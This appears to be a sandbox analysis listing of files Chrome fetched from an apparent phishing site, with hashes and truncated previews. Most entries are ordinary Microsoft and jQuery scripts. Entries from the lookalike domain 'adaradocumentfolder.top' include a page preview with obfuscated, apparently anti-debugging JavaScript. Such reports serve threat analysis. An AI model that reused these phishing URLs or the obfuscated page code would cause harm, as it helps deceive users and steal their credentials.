                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/1033/osfruntime_strings.js
                                                                                      Preview:Type.registerNamespace("Strings");Strings.OsfRuntime=function(){};Strings.OsfRuntime.registerClass("Strings.OsfRuntime");Strings.OsfRuntime.L_ActivateAttempLoading_ERR="This add-in may not load properly, but you can still try to start it.";Strings.OsfRuntime.L_ActivateAttempLoading_ERR_FirstParty="This feature may not load properly, but you can still try to start it.";Strings.OsfRuntime.L_ActivateButton_TXT="Start";Strings.OsfRuntime.L_AddinCommands_AddinNotSupported_Message="Your add-in manifest is not valid.";Strings.OsfRuntime.L_AddinCommands_LearnMore_Link="Learn more.";Strings.OsfRuntime.L_AddinsCatalogIframeTitle_TXT="Office Add-ins catalog iframe";Strings.OsfRuntime.L_AgaveActivationError_ERR="Something went wrong and we couldn't start this add-in. Please try again later or contact your system administrator.";Strings.OsfRuntime.L_AgaveActivationError_ERR_FirstParty="Something went wrong and we couldn't start this feature. Please try again later or contact your system administrat
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                      Category:downloaded
                                                                                      Size (bytes):17174
                                                                                      Entropy (8bit):2.9129715116732746
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://mohrhydrokultur.adaradocumentfolder.top/fav/6ZDSsSieGNGZatG
                                                                                      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                      Category:downloaded
                                                                                      Size (bytes):89501
                                                                                      Entropy (8bit):5.289893677458563
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65451)
                                                                                      Category:downloaded
                                                                                      Size (bytes):89493
                                                                                      Entropy (8bit):5.289599913770796
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:12108007906290015100837A6A61E9F4
                                                                                      SHA1:1D6AE46F2FFA213DEDE37A521B011EC1CD8D1AD3
                                                                                      SHA-256:C4DCCDD9AE25B64078E0C73F273DE94F8894D5C99E4741645ECE29AEEFC9C5A4
                                                                                      SHA-512:93658F3EB4A044523A7136871E125D73C9005DA44CE09045103A35A4F18695888ECAFE2F9C0D0FA741B95CC618C6000F9AD9AFFC821A400EA7E5F2C0C8968530
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.5.0.min.js
                                                                                      Preview:/*! jQuery v3.5.0 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (12695)
                                                                                      Category:dropped
                                                                                      Size (bytes):1336631
                                                                                      Entropy (8bit):5.487199543462852
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:2FCED6E6CD0963580F963BC4C20EE1B6
                                                                                      SHA1:92AE09CA220AEBB5DB448911AAABEEB28D688E9E
                                                                                      SHA-256:2D409FB1116C9A18791011CAF0B2AB2AB5C5F19CAF91C54BBF39BF7FF5DED27D
                                                                                      SHA-512:1F60E52E9BE6FE29D05A5F19BEC538CDEE5AC2E937752BE52F38C2F0070694906C6D83AC1B871A5640C4D271B57F973DBDE6AC100854E53F1F52C83F7E6F978E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:!function(){var e,t,r,n,o,a={4676:function(e,t){e.exports={Form:{Cancel:()=>"Cancel",CommentPlaceholder:()=>"Please do not include any confidential or personal information in your comment",EmailPlaceholder:()=>"Email (optional)",Submit:()=>"Send",Title:()=>"Feedback to Microsoft",TemplateErrorMessage:()=>"One or more questions are required or the input is not valid"},Questions:{ContactMeQuestion:()=>"You may contact me about this feedback"},Common:{LoadingText:()=>"Loading, please wait..."},Error:{ErrorMessage:()=>"Survey failed to load"}};},6870:function(e,t){e.exports={CloseLabel:()=>"Close dialog",EmailTextFieldPlaceholder:()=>"Email (optional)",EmailTextFieldInputError:()=>"Email address is invalid",CommentTextFieldPlaceholder:()=>"Please do not include any confidential or personal information in your comment",CommentTextFieldMaxLengthText:e=>"."+e.remainingMaxLength+". of ."+e.maxLength+". characters remaining",EmailConsentCheckboxLabel:()=>"You can contact me about this f
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (1592)
                                                                                      Category:downloaded
                                                                                      Size (bytes):6866
                                                                                      Entropy (8bit):5.018242251313076
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:A3B491174EF1CC7968AF33188A522977
                                                                                      SHA1:25A4AAA9E8F1D47F22286B8E427FABA5C0AB8BB9
                                                                                      SHA-256:AACE481226BEADED455E66DE87D25ED7371ED604E313ABC44EADA8DE5CD58E51
                                                                                      SHA-512:E026A7C3FB854F9570821232A260AFF383C92D3E290081E93271E7C803DB76E33A7B4D53A4186C1C75EA481E70B4A045B18306AE36C5CAFCBF518BCFC8052EC7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-10-11.012/wacowlhostwebpack/en-us/ondemand.resx.js
                                                                                      Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{708:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,808:e=>{e.exports=JSON.parse('{"a":"A source with id \
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with very long lines (5060)
                                                                                      Category:downloaded
                                                                                      Size (bytes):5524
                                                                                      Entropy (8bit):5.401254836164644
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:0102AF3198EC93CB425E809E25E2834A
                                                                                      SHA1:B12F506C2EBBB7BF1B08E68AC2F5A01921178C7E
                                                                                      SHA-256:D03FB9D3F59BFB1B0DD79258DB1C5184E070223D69D597466CB8DF5796F09FAC
                                                                                      SHA-512:D6C9B6CE7CF916F7752FA594A4E4EFB57596D501089C917C92F5091F774400D2E8149BCB6282D7FF1C5757B4BDBD5565BB81798724A3EDE3D244D4958B720C2E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98
                                                                                      Preview:<!DOCTYPE html>.<html>.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <title></title>. <script src="js___/671a394a1ba7f-069e1219415fe70482935df3ce64b451"></script>. <script src="b_/671a394a1ba95-069e1219415fe70482935df3ce64b451"></script>. <script src="js_/671a394a1ba96-069e1219415fe70482935df3ce64b451"></script>.</head>..<script type="text/javascript">.. var a0_0x36091f=a0_0x4f90;function a0_0x4f90(_0x5c77f4,_0x5e295b){var _0x24fcb4=a0_0x1e61();return a0_0x4f90=function(_0xdae5ab,_0x5b5a65){_0xdae5ab=_0xdae5ab-0x128;var _0x56f78a=_0x24fcb4[_0xdae5ab];return _0x56f78a;},a0_0x4f90(_0x5c77f4,_0x5e295b);}function a0_0x1e61(){var _0x82d39d=['querySelectorAll','3874OBFtVX','icon','call','init','chain','script','div','54130xusRXt','101loBJSK','title','GET','onreadystatechange','search','debu','24IuRCUU','querySelector','send','endsWith','gger','apply','6NLssGv','stylesheet','innerHTML','constructor','
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (20116), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):20116
                                                                                      Entropy (8bit):5.265227006593126
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:EDF023B23DC08C7C90BA27A3BDE7480B
                                                                                      SHA1:0F03EDBE6BDA20C20251EFF9DB86359EB5155F66
                                                                                      SHA-256:7337ED6220111758E61F3BE5060AE9A807D83EDF05D5F7CC92B0B85E34A5FEF3
                                                                                      SHA-512:93450345EE48033238467EF1BA3550F3C2FACA5C07178B1E7AAB989A4C845D7D87FC25FC33AAF431CBF1AEA5B9C3FE6619A8045B066DB5B239197072029E0740
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:!function(a){"function"==typeof define&&define.amd?define("picker",["jquery"],a):"object"==typeof exports?module.exports=a(require("jquery")):this.Picker=a(jQuery)}(function(a){function b(f,g,h,k){function l(){return b._.node("div",b._.node("div",b._.node("div",b._.node("div",w.component.nodes(r.open),t.box),t.wrap),t.frame),t.holder)}function m(){u.data(g,w).addClass(t.input).val(u.data("value")?w.get("select",s.format):f.value).on("focus."+r.id+" click."+r.id,p),s.editable||u.on("keydown."+r.id,function(a){var b=a.keyCode,c=/^(8|46)$/.test(b);return 27==b?(w.close(),!1):void((32==b||c||!r.open&&w.component.key[b])&&(a.preventDefault(),a.stopPropagation(),c?w.clear().close():w.open()))}),e(f,{haspopup:!0,expanded:!1,readonly:!1,owns:f.id+"_root"+(w._hidden?" "+w._hidden.id:"")})}function n(){w.$root.on({focusin:function(a){w.$root.removeClass(t.focused),a.stopPropagation()},"mousedown click":function(b){var c=b.target;c!=w.$root.children()[0]&&(b.stopPropagation(),"mousedown"!=b.type|
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):1696802
                                                                                      Entropy (8bit):5.421500983139629
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:E1FD17FCEC2CB35FD213E85B52850C2F
                                                                                      SHA1:0287D09192300AA91E7C6AFA684B4EF80D536CAF
                                                                                      SHA-256:5C1A339B057F4356DA637C136C76F77BF98CA7680958AC271CE0E1657C8EAB5F
                                                                                      SHA-512:A12B566E32A419B13432098D9231E3870A20C72DB82103F33F3B347ED3B9D917111F02C9D78F29D9B9081DF3E9977F139FF27922C843609FB597A972CB6D09B1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/wp5/common.min.js
                                                                                      Preview:function asyncGeneratorStep(e,t,o,n,r,i,a){try{var s=e[i](a),l=s.value}catch(e){return void o(e)}s.done?t(l):Promise.resolve(l).then(n,r)}function _async_to_generator(e){return function(){var t=this,o=arguments;return new Promise((function(n,r){var i=e.apply(t,o);function a(e){asyncGeneratorStep(i,n,r,a,s,"next",e)}function s(e){asyncGeneratorStep(i,n,r,a,s,"throw",e)}a(void 0)}))}}function _define_property(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e}function _object_spread(e){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},n=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(n=n.concat(Object.getOwnPropertySymbols(o).filter((function(e){return Object.getOwnPropertyDescriptor(o,e).enumerable})))),n.forEach((function(t){_define_property(e,t,o[t])}))}return e}function ownKeys(e,t){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.fi
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (7694)
                                                                                      Category:downloaded
                                                                                      Size (bytes):465763
                                                                                      Entropy (8bit):5.49891834171298
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:BB351812C3D14ECD554D52D4EA634BE8
                                                                                      SHA1:D36B85C4C5D4E37AA0EBDDBF2AC97DF9B0B7FE3B
                                                                                      SHA-256:DD5BEF510ABB01291BE7FA75E16B6F26CBA20EE62ADBBAC8E09E3205BF5B5084
                                                                                      SHA-512:F432E6CDC3009494273F423015F91AEFCFDF2D0311F382AC3A53A42F61F206858668E3937C05126A4D5D7969B91E8FCCD23D3DDBB7C189FFB10EF01DF7BAFC5E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-10-11.012/wacowlhostwebpack/wacowlhostwebpack.js
                                                                                      Preview:/*! For license information please see wacowlhostwebpack.js.LICENSE.txt */.(()=>{var e=document.currentScript;define("odsp-next/roots/WacOwlHost",["odsp.react.lib"],()=>{var t;return(()=>{"use strict";var n=[(e,t,n)=>{n.r(t),n.d(t,{__assign:()=>r,__asyncDelegator:()=>S,__asyncGenerator:()=>y,__asyncValues:()=>D,__await:()=>v,__awaiter:()=>l,__classPrivateFieldGet:()=>w,__classPrivateFieldSet:()=>E,__createBinding:()=>f,__decorate:()=>s,__exportStar:()=>p,__extends:()=>i,__generator:()=>u,__importDefault:()=>O,__importStar:()=>C,__makeTemplateObject:()=>I,__metadata:()=>d,__param:()=>c,__read:()=>_,__rest:()=>o,__spread:()=>h,__spreadArray:()=>g,__spreadArrays:()=>b,__values:()=>m});var a=function(e,t){return a=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},a(e,t)};function i(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):101803
                                                                                      Entropy (8bit):5.333052740426743
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:2F1D74149F052D3354358E9856375219
                                                                                      SHA1:8019F7A2EA824930F91C3EC375D926B650FB1CFF
                                                                                      SHA-256:66C70312DE6CA4E1D7EF1E858307764C241A80E7411CEE686EA2FC2D74152749
                                                                                      SHA-512:2B1C4E057DBF59E89C3AA9C5DAB1FE8F512ED400088B13592E493B3D48AA334544A7999CA2DDEFA34C23D2F96A2F98B93DD0AAC80C3CF7C37D85B49C5A85A6E6
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:var otelWorker=function(e){var n={};function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{enumerable:!0,get:r})},t.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.t=function(e,n){if(1&n&&(e=t(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(t.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var i in e)t.d(r,i,function(n){return e[n]}.bind(null,i));return r},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},t.p="",t(t.s=7)}([function(e,n,t){"use strict";t.d(n,"h",(function(){return r})),t.d(
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (14762)
                                                                                      Category:downloaded
                                                                                      Size (bytes):172129
                                                                                      Entropy (8bit):5.333844383126038
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:3807223F69B81F8B802488A647F3F03B
                                                                                      SHA1:F7449911C1FE49B8B536DD9D9A14A659D924279B
                                                                                      SHA-256:38D5ADF71F9E522CA10B22FDA7BE148F0B2537E8B06F8981EFACB58B937B72CD
                                                                                      SHA-512:324E89C50507D8EEC6F326F84505E48BBDEFB551507E16E57753BCBEEB660C649582DA444DAEEC4ADD9F778735DC40D0F25A8D3367BEB4405540B988313F2F5D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-10-11.012/wacowlhostwebpack/9.js
                                                                                      Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[9,4],{235:function(e,t,n){var a;!function(i,r){"use strict";var o=function(e){if("object"!=typeof e.document)throw new Error("Cookies.js requires a `window` with a `document` object");var t=function(e,n,a){return 1===arguments.length?t.get(e):t.set(e,n,a)};return t._document=e.document,t._cacheKeyPrefix="cookey.",t._maxExpireDate=new Date("Fri, 31 Dec 9999 23:59:59 UTC"),t.defaults={path:"/",secure:!1},t.get=function(e){return t._cachedDocumentCookie!==t._document.cookie&&t._renewCache(),t._cache[t._cacheKeyPrefix+e]},t.set=function(e,n,a){return(a=t._getExtendedOptions(a)).expires=t._getExpiresDate(n===r?-1:a.expires),t._document.cookie=t._generateCookieString(e,n,a),t},t.expire=function(e,n){return t.set(e,r,n)},t._getExtendedOptions=function(e){return{path:e&&e.path||t.defaults.path,domain:e&&e.domain||t.defaults.domain,expires:e&&e.expires||t.defaults.expires,secure:e&&e.secure!==r?e.secure:t.defaults.secure}},t._isVa
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):175719
                                                                                      Entropy (8bit):4.255303968193695
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:9CFEFB2D46D6102DAC2A24C606F47FEA
                                                                                      SHA1:076B63F4F46CE28648201E2507BBC67FB4F990C5
                                                                                      SHA-256:43C5939CB732D8AA2D20FCE97F359F46B7C3B937E60ED576B752AE0A2E73314F
                                                                                      SHA-512:C56812F0A9DCBC53E8AFA542923F20E911DE172C1D87B9868DB42A01F2FC303BBECE6509925E43E8F877DC8A3C7904FAE731C1C19BD35B5FAD18582B7498E24D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/OfficeExtension.WacRuntime.js
                                                                                      Preview:var __extends = (this && this.__extends) || (function () {.. var extendStatics = function (d, b) {.. extendStatics = Object.setPrototypeOf ||.. ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) ||.. function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; };.. return extendStatics(d, b);.. };.. return function (d, b) {.. extendStatics(d, b);.. function __() { this.constructor = d; }.. d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());.. };..})();..var OfficeExtension;..(function (OfficeExtension) {.. var WacRuntime;.. (function (WacRuntime) {.. var ApiFlags;.. (function (ApiFlags) {.. ApiFlags[ApiFlags["none"] = 0] = "none";.. ApiFlags[ApiFlags["restrictedResource"] = 4] = "restrictedResource";.. ApiFlags[ApiFlags["makerSafe"] = 128] = "makerSafe";.. ApiFlags[ApiFlags["excludedF
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):104
                                                                                      Entropy (8bit):4.652366936165945
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:32F8A2D4D61357364546360BB6C0210A
                                                                                      SHA1:BC533ED423C94263B914F46408EEFEC4C2EE1810
                                                                                      SHA-256:9EE89043D0DC68F73D36FD5DE75068E5FF66C7745A144E2CD7FB09D43952AA52
                                                                                      SHA-512:C27578D82848E9186D4CDB405F1AE3ACBCA0671AA155293CDF12A7C9105123A9DF20AB753005315364EBFF8956B7255FEB2DAC3B8B5598C6856B905C2BD7AE17
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSJQmCISteP9CrShIFDdjY4LISBQ11LGDrEgUN2NjgshIFDXUsYOsSJQkz0fqxH4eRXhIFDdjY4LISBQ11LGDrEgUN2NjgshIFDXUsYOs=?alt=proto
                                                                                      Preview:CiQKBw3Y2OCyGgAKBw11LGDrGgAKBw3Y2OCyGgAKBw11LGDrGgAKJAoHDdjY4LIaAAoHDXUsYOsaAAoHDdjY4LIaAAoHDXUsYOsaAA==
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):210219
                                                                                      Entropy (8bit):5.519964966089905
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:8E9FFFA7BE90F048F46B6CCA399661F2
                                                                                      SHA1:9E8F440BA763918EF08D4FC523E2C11073677A4C
                                                                                      SHA-256:67CB3AFF2EBBF18F67B2823712560A8103771722010E9EAE0D91840AB407F539
                                                                                      SHA-512:40B430641309CC1B3DE0A3CE8213B71058CAA14EC65D6847B30808ACE7A7517901CA4E335619A1847B1556B9331862EC2D26EB7687995D794DAC2363243C60DA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://wise.public.cdn.office.net/wise/owl/owl.60b0607ba5126556995f.js
                                                                                      Preview:var Microsoft;!function(){"use strict";var t,e,n,o,r={32812:function(t,e,n){n.d(e,{h:function(){return s}});var o=n(13260),r=n(40426),i=n(19665),s=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.value=null,e.hasNext=!1,e.hasCompleted=!1,e}return o.C6(e,t),e.prototype.N=function(e){return this.hasError?(e.error(this.thrownError),i.y.EMPTY):this.hasCompleted&&this.hasNext?(e.next(this.value),e.complete(),i.y.EMPTY):t.prototype.N.call(this,e)},e.prototype.next=function(t){this.hasCompleted||(this.value=t,this.hasNext=!0)},e.prototype.error=function(e){this.hasCompleted||t.prototype.error.call(this,e)},e.prototype.complete=function(){this.hasCompleted=!0,this.hasNext&&t.prototype.next.call(this,this.value),t.prototype.complete.call(this)},e}(r.B7)},39188:function(t,e,n){n.d(e,{t:function(){return s}});var o=n(13260),r=n(40426),i=n(92581),s=function(t){function e(e){var n=t.call(this)||this;return n.B=e,n}return o.C6(e,t),Object.defineProperty(e.prototype,"va
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):10290
                                                                                      Entropy (8bit):4.837717444305284
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:4DF9B0011F8AE623E26116BC635CFB36
                                                                                      SHA1:0D68BBCB58D190F6E2803043A1823A3826325F33
                                                                                      SHA-256:47D6DBDB766BD7EA675F68A5CE5A22654554001EFC7007A0B8C484069D9E2638
                                                                                      SHA-512:3BD8C4FDCC43199DB8D4EA1E668495837AF3931EAD7EA4AC16D775D3FBDF3BC35833CF2DF86BE8492EDC82090A1ED2B79A4DC3233BC3FD064F7C46424B403745
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_resources/1033/moeerrorux.css
                                                                                      Preview:.moe-infobar-body {.. background-color:#FCF7B6;.. border:1px solid #D9D98B;.. position:relative;.. max-height:110px;.. overflow:hidden;.. white-space: normal;..}.....moe-infobar-body:hover {.. background-color:#FEF294;..}.....moe-hovered {.. background-color:#FEF294;..}.....moe-infobar-infotable {.. width:100%;.. height:100%;.. max-height:110px;..}.....moe-infobar-top-left-cell {.. width:30px;.. min-width:30px;.. max-width:30px;.. vertical-align:top;.. padding:1px; ..}.....moe-infobar-message-cell {.. padding:7px 7px 3px 0px;.. vertical-align:top;..}.....moe-infobar-top-right-cell {.. width:20px;.. min-width:20px;.. max-width:20px;.. vertical-align:top;..}.....moe-infobar-button-cell {.. padding:0px 10px 6px 0px;..}.....moe-status-warning-icon{.. position:absolute;.. clip:rect(0px 42px 41px 0px);.. top:0px;.. left:0px;.. .. .. .. .. .. ..}.....moe-status-warning-icon_ie{.. position:ab
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):89749
                                                                                      Entropy (8bit):5.907896932868388
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:1BF11FC2DBDB5C48B7D60F5005583417
                                                                                      SHA1:DF52B131F6B151E674204CBA77082EFAEFBC3F8C
                                                                                      SHA-256:172E218E70CC419328B7AAB580615DA2A562E1508EAC9AC3014C52C51F2F50EC
                                                                                      SHA-512:A40545B0B88AAF5EC4D28015B72451CE6F19073FC7E1CF6A8B08EEAB6D173CCE9E62553CACFDA7FE0FB4DDECB2E09E8B966C6466AE50AC31193481D82898ECB6
                                                                                      Malicious:false
                                                                                      Reputation:unknown
